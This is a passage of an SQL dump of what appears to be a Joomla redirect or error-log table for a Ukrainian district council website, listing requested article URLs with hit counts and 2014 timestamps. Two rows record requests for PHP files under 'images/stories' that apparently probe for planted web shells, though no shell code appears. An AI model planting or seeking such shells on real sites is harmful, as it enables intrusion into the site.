00:00:00',301),(1322,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-17 11:01:45','0000-00-00 00:00:00',301),(1323,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&lang=uk&Itemid=','','','',5,0,'2014-09-17 11:02:23','0000-00-00 00:00:00',301),(1324,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=uk','','','',9,0,'2014-09-17 11:03:46','0000-00-00 00:00:00',301),(1325,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1120:2013-10-25-12-32-17&catid=53&Itemid=94&lang=en','','','',12,0,'2014-09-17 11:09:22','0000-00-00 00:00:00',301),(1326,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&catid=56&Itemid=97&lang=en','','','',7,0,'2014-09-17 11:09:29','0000-00-00 00:00:00',301),(1327,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=53&Itemid=94&lang=uk','','','',8,0,'2014-09-17 11:09:44','0000-00-00 00:00:00',301),(1328,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=ru','','','',4,0,'2014-09-17 11:10:01','0000-00-00 00:00:00',301),(1329,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=53&Itemid=94&lang=uk','','','',8,0,'2014-09-17 11:11:19','0000-00-00 00:00:00',301),(1330,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&catid=56&Itemid=97&lang=uk','','','',14,0,'2014-09-17 11:12:07','0000-00-00 00:00:00',301),(1331,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=988:-2013-&catid=49:--12042013-&Itemid=88&lang=uk','','','',19,0,'2014-09-17 11:12:09','0000-00-00 00:00:00',301),(1332,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1169:2014-01-08-07-30-47&catid=55&Itemid=96&lang=en','','','',8,0,'2014-09-17 11:13:02','0000-00-00 00:00:00',301),(1333,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&Itemid=14&lang=uk','','','',11,0,'2014-09-17 11:13:04','0000-00-00 00:00:00',301),(1334,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&Itemid=14&lang=en','','','',14,0,'2014-09-17 11:13:56','0000-00-00 00:00:00',301),(1335,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1058:-2013-&catid=51:--19072013-&Itemid=92&lang=uk','','','',17,0,'2014-09-17 11:16:00','0000-00-00 00:00:00',301),(1336,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1054:2013-07-19-11-38-20&catid=51:--19072013-&Itemid=92&lang=en','','','',19,0,'2014-09-17 11:16:35','0000-00-00 00:00:00',301),(1337,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-17 11:16:48','0000-00-00 00:00:00',301),(1338,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&catid=56&Itemid=97&lang=ru','','','',7,0,'2014-09-17 11:18:12','0000-00-00 00:00:00',301),(1339,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-14052014-&catid=59&Itemid=107&lang=en','','','',7,0,'2014-09-17 11:19:11','0000-00-00 00:00:00',301),(1340,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=ru&Itemid=','','','',5,0,'2014-09-17 11:19:46','0000-00-00 00:00:00',301),(1341,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&lang=en&Itemid=0','','','',4,0,'2014-09-17 11:19:48','0000-00-00 00:00:00',301),(1342,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1246:-2013-&catid=57&Itemid=98&lang=en','','','',11,0,'2014-09-17 11:19:51','0000-00-00 00:00:00',301),(1343,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11&lang=uk&Itemid=0','','','',9,0,'2014-09-17 11:20:32','0000-00-00 00:00:00',301),(1344,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1168:2014-01-08-07-14-14&catid=55&Itemid=96&lang=uk','','','',6,0,'2014-09-17 11:26:32','0000-00-00 00:00:00',301),(1345,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-2013-i-2014-&catid=56:--03022014-&Itemid=97&lang=ru','','','',4,0,'2014-09-17 11:27:08','0000-00-00 00:00:00',301),(1346,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-17 11:31:48','0000-00-00 00:00:00',301),(1347,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1371:2014-08-04-19-11-42&catid=11&Itemid=14&lang=uk','','','',14,0,'2014-09-17 11:34:17','0000-00-00 00:00:00',301),(1348,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1260:2014-03-31-11-32-51&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',11,0,'2014-09-17 11:38:00','0000-00-00 00:00:00',301),(1349,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',14,0,'2014-09-17 11:39:15','0000-00-00 00:00:00',301),(1350,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:-2014-&catid=56&Itemid=97&lang=uk','','','',8,0,'2014-09-17 11:41:43','0000-00-00 00:00:00',301),(1351,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1287:2014-04-23-06-49-34&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',7,0,'2014-09-17 11:42:58','0000-00-00 00:00:00',301),(1352,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-17 11:45:02','0000-00-00 00:00:00',301),(1353,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&catid=57:--15042014-&Itemid=98&lang=ru','','','',17,0,'2014-09-17 11:47:56','0000-00-00 00:00:00',301),(1354,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:-2014-&catid=53:--25102013-&Itemid=94&lang=uk','','','',5,0,'2014-09-17 11:57:52','0000-00-00 00:00:00',301),(1355,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',16,0,'2014-09-17 12:01:38','0000-00-00 00:00:00',301),(1356,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&catid=56&Itemid=97&lang=uk','','','',16,0,'2014-09-17 12:02:54','0000-00-00 00:00:00',301),(1357,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=36&Itemid=70&lang=uk','','','',6,0,'2014-09-17 12:07:13','0000-00-00 00:00:00',301),(1358,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=53&Itemid=94&lang=en','','','',8,0,'2014-09-17 12:13:37','0000-00-00 00:00:00',301),(1359,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=47&Itemid=86&lang=en','','','',15,0,'2014-09-17 12:20:49','0000-00-00 00:00:00',301),(1360,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&Itemid=14&lang=uk','','','',16,0,'2014-09-17 12:28:58','0000-00-00 00:00:00',301),(1361,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&lang=uk','','','',7,0,'2014-09-17 12:32:47','0000-00-00 00:00:00',301),(1362,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&catid=56&Itemid=97&lang=en','','','',11,0,'2014-09-17 12:33:26','0000-00-00 00:00:00',301),(1363,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=en','','','',4,0,'2014-09-17 12:33:33','0000-00-00 00:00:00',301),(1364,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&Itemid=14&lang=ru','','','',9,0,'2014-09-17 12:34:43','0000-00-00 00:00:00',301),(1365,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&Itemid=14&lang=en','','','',13,0,'2014-09-17 12:38:55','0000-00-00 00:00:00',301),(1366,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',9,0,'2014-09-17 12:41:54','0000-00-00 00:00:00',301),(1367,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1288:2014-04-23-06-50-40&catid=10&Itemid=17&lang=en','','','',8,0,'2014-09-17 12:41:57','0000-00-00 00:00:00',301),(1368,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-17 12:43:15','0000-00-00 00:00:00',301),(1369,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=319:-2009-2011-&catid=33&Itemid=66&lang=en','','','',10,0,'2014-09-17 12:44:41','0000-00-00 00:00:00',301),(1370,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=en','','','',6,0,'2014-09-17 12:46:28','0000-00-00 00:00:00',301),(1371,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-l-r-2012-2015-&catid=51:--19072013-&Itemid=92&lang=en','','','',14,0,'2014-09-17 12:46:46','0000-00-00 00:00:00',301),(1372,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1225:2014-02-24-13-27-21&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',22,0,'2014-09-17 12:49:18','0000-00-00 00:00:00',301),(1373,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&Itemid=14&lang=ru','','','',8,0,'2014-09-17 12:49:45','0000-00-00 00:00:00',301),(1374,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-17 12:49:47','0000-00-00 00:00:00',301),(1375,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&Itemid=14&lang=ru','','','',9,0,'2014-09-17 12:49:51','0000-00-00 00:00:00',301),(1376,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11&Itemid=14&lang=uk','','','',15,0,'2014-09-17 12:51:11','0000-00-00 00:00:00',301),(1377,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1067:2013-08-16-15-28-50&catid=52:--16082013-&Itemid=93&lang=uk','','','',19,0,'2014-09-17 12:51:14','0000-00-00 00:00:00',301),(1378,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1141:2013-11-26-13-18-12&catid=54&Itemid=95&lang=en','','','',9,0,'2014-09-17 12:51:33','0000-00-00 00:00:00',301),(1379,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&catid=56:--03022014-&Itemid=97&lang=en','','','',10,0,'2014-09-17 12:52:43','0000-00-00 00:00:00',301),(1380,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1226:-1996-2004-&catid=11&lang=ru','','','',5,0,'2014-09-17 12:52:49','0000-00-00 00:00:00',301),(1381,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-17 12:53:02','0000-00-00 00:00:00',301),(1382,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&lang=en&Itemid=0','','','',4,0,'2014-09-17 12:53:16','0000-00-00 00:00:00',301),(1383,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-----------------14052014-&catid=36&Itemid=70&lang=en','','','',7,0,'2014-09-17 12:53:28','0000-00-00 00:00:00',301),(1384,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=ru&Itemid=0','','','',5,0,'2014-09-17 12:53:44','0000-00-00 00:00:00',301),(1385,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1112:2013-10-23-09-24-43&catid=53&Itemid=94&lang=en','','','',8,0,'2014-09-17 12:55:02','0000-00-00 00:00:00',301),(1386,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=881:2012-12-21-17-06-15&catid=46:--21122012&Itemid=85&lang=ru','','','',7,0,'2014-09-17 12:55:16','0000-00-00 00:00:00',301),(1387,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:-l-r&catid=57:--15042014-&Itemid=98&lang=uk','','','',6,0,'2014-09-17 12:55:45','0000-00-00 00:00:00',301),(1388,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-17 12:56:30','0000-00-00 00:00:00',301),(1389,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-17 13:03:50','0000-00-00 00:00:00',301),(1390,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-17 13:31:01','0000-00-00 00:00:00',301),(1391,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=6:2010-06-05-12-52-17&layout=blog&Itemid=9&lang=ru','','','',3,0,'2014-09-17 14:11:18','0000-00-00 00:00:00',301),(1392,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11&Itemid=14&lang=en','','','',11,0,'2014-09-17 14:18:44','0000-00-00 00:00:00',301),(1393,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',3,0,'2014-09-17 14:39:32','0000-00-00 00:00:00',301),(1394,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=36&Itemid=70&lang=ru','','','',5,0,'2014-09-17 14:40:07','0000-00-00 00:00:00',301),(1395,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1286:2014-04-23-06-48-27&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',12,0,'2014-09-17 14:49:39','0000-00-00 00:00:00',301),(1396,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',10,0,'2014-09-17 14:51:47','0000-00-00 00:00:00',301),(1397,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-17 14:52:05','0000-00-00 00:00:00',301),(1398,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-17 14:52:07','0000-00-00 00:00:00',301),(1399,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=878:2012-12-21-16-59-28&catid=46&Itemid=85&lang=en','','','',9,0,'2014-09-17 14:53:18','0000-00-00 00:00:00',301),(1400,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=4&Itemid=8&lang=en','','','',29,0,'2014-09-17 14:53:29','0000-00-00 00:00:00',301),(1401,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=969:-2013-&catid=46:--21122012&Itemid=85&lang=ru','','','',12,0,'2014-09-17 14:53:37','0000-00-00 00:00:00',301),(1402,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=931:2013-02-21-09-14-48&catid=47:-21022013-&Itemid=86&lang=en','','','',4,0,'2014-09-17 14:54:44','0000-00-00 00:00:00',301),(1403,'http://www.malyn-rayrada.org.ua/images/stories/racionais.php?rf','','','',1,0,'2014-09-17 14:57:05','0000-00-00 00:00:00',301),(1404,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:-27-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-17 15:00:05','0000-00-00 00:00:00',301),(1405,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&Itemid=14&lang=en','','','',6,0,'2014-09-17 15:00:35','0000-00-00 00:00:00',301),(1406,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1141:2013-11-26-13-18-12&catid=54:--29112013-&Itemid=95&lang=en','','','',10,0,'2014-09-17 15:00:41','0000-00-00 00:00:00',301),(1407,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-------2013--------i--2014--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',8,0,'2014-09-17 15:02:32','0000-00-00 00:00:00',301),(1408,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1167:--------l-r-------&catid=55:--26122013-&Itemid=96&lang=uk','','','',31,0,'2014-09-17 15:02:50','0000-00-00 00:00:00',301),(1409,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=969:-2013-&catid=46&Itemid=85&lang=uk','','','',2,0,'2014-09-17 15:03:29','0000-00-00 00:00:00',301),(1410,'http://www.malyn-rayrada.org.ua/images/stories/explore.php?rf','','','',5,0,'2014-09-17 15:07:03','0000-00-00 00:00:00',301),(1411,'http://www.malyn-rayrada.org.ua/index.php/2010-06-06-05-22-15','','http://www.malyn-rayrada.org.ua/index.php?start=10','',2,0,'2014-09-17 15:07:39','0000-00-00 00:00:00',301),(1412,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=6&Itemid=9&lang=ru','','','',29,0,'2014-09-17 15:08:10','0000-00-00 00:00:00',301),(1413,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1055:2013-07-19-11-43-17&catid=51:--19072013-&Itemid=92&lang=uk','','','',9,0,'2014-09-17 15:12:51','0000-00-00 00:00:00',301),(1414,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-----------------14052014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',7,0,'2014-09-17 15:15:55','0000-00-00 00:00:00',301),(1415,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=ru&Itemid=0','','','',5,0,'2014-09-17 15:18:41','0000-00-00 00:00:00',301),(1416,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=en&Itemid=','','','',6,0,'2014-09-17 15:19:39','0000-00-00 00:00:00',301),(1417,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&lang=en','','','',5,0,'2014-09-17 15:19:55','0000-00-00 00:00:00',301),(1418,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-2013-&catid=51:--19072013-&Itemid=92&lang=uk','','','',18,0,'2014-09-17 15:21:39','0000-00-00 00:00:00',301),(1419,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&lang=en','','','',9,0,'2014-09-17 15:22:37','0000-00-00 00:00:00',301),(1420,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','https://www.google.com.ua/','',17,0,'2014-09-17 15:23:39','0000-00-00 00:00:00',301),(1421,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1297:2014-04-24-09-20-07&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',15,0,'2014-09-17 15:25:24','0000-00-00 00:00:00',301),(1422,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',19,0,'2014-09-17 15:25:25','0000-00-00 00:00:00',301),(1423,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-17 15:26:50','0000-00-00 00:00:00',301),(1424,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11&lang=en&Itemid=0','','','',4,0,'2014-09-17 15:27:08','0000-00-00 00:00:00',301),(1425,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-17 15:28:51','0000-00-00 00:00:00',301),(1426,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-17 15:56:14','0000-00-00 00:00:00',301),(1427,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=en&Itemid=0','','','',5,0,'2014-09-17 16:03:21','0000-00-00 00:00:00',301),(1428,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=uk&Itemid=0','','','',4,0,'2014-09-17 16:03:27','0000-00-00 00:00:00',301),(1429,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',20,0,'2014-09-17 16:03:37','0000-00-00 00:00:00',301),(1430,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-17 16:05:47','0000-00-00 00:00:00',301),(1431,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1168:2014-01-08-07-14-14&catid=55&Itemid=96&lang=ru','','','',13,0,'2014-09-17 16:08:03','0000-00-00 00:00:00',301),(1432,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1374:2014-08-22-07-43-09&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-17 16:11:53','0000-00-00 00:00:00',301),(1433,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=53&Itemid=94&lang=ru','','','',12,0,'2014-09-17 16:14:59','0000-00-00 00:00:00',301),(1434,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=985:2013-04-12-09-53-08&catid=49:--12042013-&Itemid=88&lang=en','','','',11,0,'2014-09-17 16:16:01','0000-00-00 00:00:00',301),(1435,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=56&Itemid=97&lang=en','','','',11,0,'2014-09-17 16:18:00','0000-00-00 00:00:00',301),(1436,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1119:2013-10-25-12-26-37&catid=53:--25102013-&Itemid=94&lang=uk','','','',14,0,'2014-09-17 16:18:11','0000-00-00 00:00:00',301),(1437,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11&lang=en','','','',11,0,'2014-09-17 16:21:25','0000-00-00 00:00:00',301),(1438,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&lang=ru&Itemid=','','','',10,0,'2014-09-17 16:23:10','0000-00-00 00:00:00',301),(1439,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=10:2013-02-22-07-29-10&lang=en','','','',8,0,'2014-09-17 16:24:10','0000-00-00 00:00:00',301),(1440,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1366:-2014-&catid=60:--11072014-&Itemid=108&lang=en','','','',11,0,'2014-09-17 16:25:43','0000-00-00 00:00:00',301),(1441,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=uk','','','',9,0,'2014-09-17 16:27:07','0000-00-00 00:00:00',301),(1442,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',18,0,'2014-09-17 16:29:10','0000-00-00 00:00:00',301),(1443,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',3,0,'2014-09-17 16:29:26','0000-00-00 00:00:00',301),(1444,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&catid=56&Itemid=97&lang=en','','','',14,0,'2014-09-17 16:29:27','0000-00-00 00:00:00',301),(1445,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:----------------l--r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',14,0,'2014-09-17 16:31:47','0000-00-00 00:00:00',301),(1446,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1248:2014-03-21-18-16-44&catid=11&lang=en','','','',10,0,'2014-09-17 16:33:24','0000-00-00 00:00:00',301),(1447,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1352:2014-06-26-06-51-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',13,0,'2014-09-17 16:35:11','0000-00-00 00:00:00',301),(1448,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=939:-18-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-17 16:35:28','0000-00-00 00:00:00',301),(1449,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',18,0,'2014-09-17 16:38:31','0000-00-00 00:00:00',301),(1450,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&Itemid=14&lang=ru','','','',10,0,'2014-09-17 16:38:46','0000-00-00 00:00:00',301),(1451,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1000:1&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-17 16:38:51','0000-00-00 00:00:00',301),(1452,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=en','','','',10,0,'2014-09-17 16:39:33','0000-00-00 00:00:00',301),(1453,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=878:2012-12-21-16-59-28&catid=46&Itemid=85&lang=ru','','','',7,0,'2014-09-17 16:39:53','0000-00-00 00:00:00',301),(1454,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',14,0,'2014-09-17 16:40:39','0000-00-00 00:00:00',301),(1455,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&lang=en','','','',13,0,'2014-09-17 16:40:56','0000-00-00 00:00:00',301),(1456,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&lang=en','','','',9,0,'2014-09-17 16:41:54','0000-00-00 00:00:00',301),(1457,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=982:2013-04-03-11-58-18&catid=49:--12042013-&Itemid=88&lang=en','','','',18,0,'2014-09-17 16:42:10','0000-00-00 00:00:00',301),(1458,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',20,0,'2014-09-17 16:44:21','0000-00-00 00:00:00',301),(1459,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=en','','','',10,0,'2014-09-17 16:45:28','0000-00-00 